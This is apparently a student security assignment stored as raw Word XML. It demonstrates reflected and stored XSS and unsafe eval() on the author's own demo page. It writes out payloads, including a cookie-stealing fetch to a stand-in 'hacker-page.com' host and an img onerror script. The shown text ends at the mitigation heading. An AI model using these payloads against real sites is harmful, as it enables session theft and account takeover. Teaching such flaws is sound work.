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2BAC" w14:textId="0BF400B1" w:rsidR="0089748E" w:rsidRDefault="00582F2C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00952EE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Project 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACB4F0F" w14:textId="31690F6C" w:rsidR="001571B2" w:rsidRPr="00952EE1" w:rsidRDefault="001571B2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00CA7400" w:rsidRPr="0034438A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/AryanShrestha/Project2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CA7400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12390DE4" w14:textId="2D81EE7E" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Provide a JavaScript code injection via web applications, where an attacker can inject malicious scripts into web pages. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA728FE" w14:textId="759F1841" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>For this I have written a simple webpage in HTML with Java</w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cript to demonstrate how</w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cript can be used to exploit users</w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t xml:space="preserve"> if not implemented safely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. It is a basic page where a user can leave a comment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5283996D" w14:textId="51009550" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00582F2C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="468EAB2D" wp14:editId="3D5B2E4A">
            <wp:extent cx="4773881" cy="1768784"/>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33" cy="1771879"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D11AE" w14:textId="53D20C04" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Here is the underlining code for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507EAE15" w14:textId="16032C54" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00FB2858">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29984434" wp14:editId="3435FBA1">
            <wp:extent cx="3509158" cy="4351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534" cy="4400031"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4777E" w14:textId="3F3A573E" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In this page there is a greeting section where the JS can parse the </w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for name parameter and if provided it will use that name to greet the user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB83551" w14:textId="1E4B6CB9" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00582F2C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="094111AA" wp14:editId="204F53B8">
            <wp:extent cx="450595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019317"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E96B57F" w14:textId="49C2AE97" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But we can see that the parameter is just parsed and rendered in the DOM without being sanitized. This can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00582F2C">
        <w:t>Cross-Site Scripting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability. </w:t>
      </w:r>
      <w:r w:rsidR="003C2C19">
        <w:t>For example:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a hacker </w:t>
      </w:r>
      <w:r w:rsidR="00A52A69">
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r>
        <w:t>add following script</w:t>
      </w:r>
      <w:r w:rsidR="003C2C19">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954D86F" w14:textId="14570891" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582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643194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=&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'https://</w:t>
      </w:r>
      <w:r w:rsidR="003C2C19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>hacker-page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>.com/?</w:t>
      </w:r>
      <w:r w:rsidR="003C2C19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>hacked-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="003C2C19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>ookie</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cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD8166" w14:textId="26B9D8C9" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BE6060" w14:textId="6B9EC79A" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a user visits this page with the following param’s attached in the URL, the script will collect the user’s cookies and forward that to hacker’s page which the hacker can use to access the users accounts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C48F8" w14:textId="00682CD6" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378CBFF2" w14:textId="3A515D36" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Similarly</w:t>
      </w:r>
      <w:r w:rsidR="001F5A84">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> there is another vulnerability in this page, the comment box. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F72FED0" w14:textId="1C4BA49D" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF6E644" w14:textId="69A917C2" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="003C2C19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="776755E0" wp14:editId="03BC4B80">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6645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17015867" w14:textId="7DF0EEF4" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00140D37" w14:textId="11BC8BE1" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="003C2C19">
        <w:t xml:space="preserve">As </w:t>
      </w:r>
      <w:r>
        <w:t>we can see</w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C19">
        <w:t xml:space="preserve"> in the code, comments </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">submitted by users </w:t>
      </w:r>
      <w:r w:rsidRPr="003C2C19">
        <w:t>are not being sanitized before being posted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="001F5A84" w:rsidRPr="001F5A84">
        <w:t xml:space="preserve">all submitted </w:t>
      </w:r>
      <w:r w:rsidR="001F5A84">
        <w:t>comment</w:t>
      </w:r>
      <w:r w:rsidR="001F5A84" w:rsidRPr="001F5A84">
        <w:t xml:space="preserve"> is rendered directly</w:t>
      </w:r>
      <w:r w:rsidR="001F5A84">
        <w:t xml:space="preserve">. This </w:t>
      </w:r>
      <w:r w:rsidR="001F5A84" w:rsidRPr="001F5A84">
        <w:t xml:space="preserve">may expose the application to security vulnerabilities such as </w:t>
      </w:r>
      <w:r w:rsidR="001F5A84">
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidR="001F5A84" w:rsidRPr="001F5A84">
        <w:t>cross-site scripting (XSS).</w:t>
      </w:r>
      <w:r w:rsidR="001F5A84">
        <w:t xml:space="preserve"> If a hacker adds a script in the comment box and we save it to our DB, every time we render that comment the script will run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EE892" w14:textId="17A84947" w:rsidR="001F5A84" w:rsidRDefault="001F5A84" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>For example</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if a hacker added ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5A84">
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F5A84">
        <w:t>="alert('</w:t>
      </w:r>
      <w:r>
        <w:t>Hacked!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5A84">
        <w:t>')"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>’ in the comment and we save it to our DB. Every time someone visits the page and we try to render this comment an alert all pop up saying we are hacked.</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t xml:space="preserve"> Similarly</w:t>
      </w:r>
      <w:r w:rsidR="00C75647">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t xml:space="preserve"> that can add any script they want to add in place of that alert script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCE2DB3" w14:textId="73D3D7C5" w:rsidR="001F5A84" w:rsidRDefault="001F5A84" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001F5A84">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21099E13" wp14:editId="00ADD974">
            <wp:extent cx="5943600" cy="188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8490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A47DB4D" w14:textId="77777777" w:rsidR="003C2C19" w:rsidRDefault="003C2C19" w:rsidP="003C2C19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D69FFF" w14:textId="4DA66A4D" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Provide a dynamic evaluation of code at runtime, such as eval() in JavaScript that can be exploited by attackers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448E49E" w14:textId="05953AAC" w:rsidR="00717E9E" w:rsidRDefault="00717E9E" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In JavaScript </w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be used to dynamically evaluate a code at runtime. It is a very useful expression but if used improperly it can open up a lot of exploitation opportunities. To demonstrate this</w:t>
      </w:r>
      <w:r w:rsidR="00EE4EDF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I have create</w:t>
      </w:r>
      <w:r w:rsidR="00EE4EDF">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a simple web page that takes user input as a string and passes it through eval function to run it as a JS script.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008B4155" w:rsidRPr="008B4155">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26BFE39C" wp14:editId="77924D5A">
            <wp:extent cx="5082639" cy="1551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683" cy="1556602"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C49C8" w14:textId="4A1292ED" w:rsidR="00717E9E" w:rsidRDefault="00717E9E" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Here is the code for it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CEF8D" w14:textId="75DB5590" w:rsidR="00717E9E" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008B4155">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A6E669A" wp14:editId="4302BD80">
            <wp:extent cx="3951758" cy="2980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145" cy="3005135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E24D6BD" w14:textId="164F0B8C" w:rsidR="008B4155" w:rsidRDefault="00717E9E" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the script section we can see that we are not sanitizing the user input at all before passing it to the eval function. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717AA923" w14:textId="082C06E2" w:rsidR="008B4155" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If we pass a math </w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>expression,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we will get the result properly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73569425" w14:textId="16DCF253" w:rsidR="008B4155" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008B4155">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="354918B8" wp14:editId="47DAEC19">
            <wp:extent cx="4298868" cy="186973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112" cy="1877232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EC0318" w14:textId="7EA2D4DD" w:rsidR="00717E9E" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">But </w:t>
      </w:r>
      <w:r w:rsidR="00717E9E">
        <w:t>we add ‘</w:t>
      </w:r>
      <w:r w:rsidR="00717E9E" w:rsidRPr="00717E9E">
        <w:t>alert('Hello Aryan!')</w:t>
      </w:r>
      <w:r w:rsidR="00717E9E">
        <w:t xml:space="preserve">’ and click run, it will run it as a JS script and alert us saying “Hello Aryan!”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEF807" w14:textId="469D9680" w:rsidR="00717E9E" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="008B4155">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A38657" wp14:editId="1541FCBA">
            <wp:extent cx="5943600" cy="1758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8315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D4856F" w14:textId="4E849ACD" w:rsidR="00717E9E" w:rsidRDefault="008B4155" w:rsidP="00717E9E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On top on that, </w:t>
      </w:r>
      <w:r w:rsidR="00717E9E">
        <w:t>a hacker can use this to do whatever they want. For example</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00717E9E">
        <w:t xml:space="preserve"> they can </w:t>
      </w:r>
      <w:r w:rsidR="00ED7DE1">
        <w:t xml:space="preserve">add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E62516" w14:textId="065F1408" w:rsidR="00ED7DE1" w:rsidRDefault="00ED7DE1" w:rsidP="00ED7D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862056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fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>'https://hacker-page.com/?hacked-cookie='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7F819" w14:textId="62EF082A" w:rsidR="00ED7DE1" w:rsidRDefault="00ED7DE1" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B4155">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>nd click run. The eval will evaluate this, which will fetch the user’s cookies and forward that to the hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BF177" w14:textId="77777777" w:rsidR="00ED7DE1" w:rsidRDefault="00ED7DE1" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718C4E8E" w14:textId="6A114572" w:rsidR="00ED7DE1" w:rsidRDefault="00ED7DE1" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Eval function is dangerous because c</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t xml:space="preserve">ode run via </w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t>eval()</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t xml:space="preserve"> has exactly the same permissions as your own scripts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t xml:space="preserve">access to cookies, DOM, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t>, etc.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t xml:space="preserve">Once an attacker controls </w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t>eval()</w:t>
      </w:r>
      <w:r w:rsidR="00A15493">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t xml:space="preserve">, they can redefine functions, hook event handlers, or </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">even </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED7DE1">
        <w:t>ship new payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE208ED" w14:textId="77777777" w:rsidR="00ED7DE1" w:rsidRDefault="00ED7DE1" w:rsidP="00ED7DE1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2949CE80" w14:textId="48561DBA" w:rsidR="00582F2C" w:rsidRDefault="00582F2C" w:rsidP="00582F2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then provide the mitigation code to fix the security problems for the vulnerabilities you listed in 1 and 2.</w:t>
      </w:r>
    </w:p>
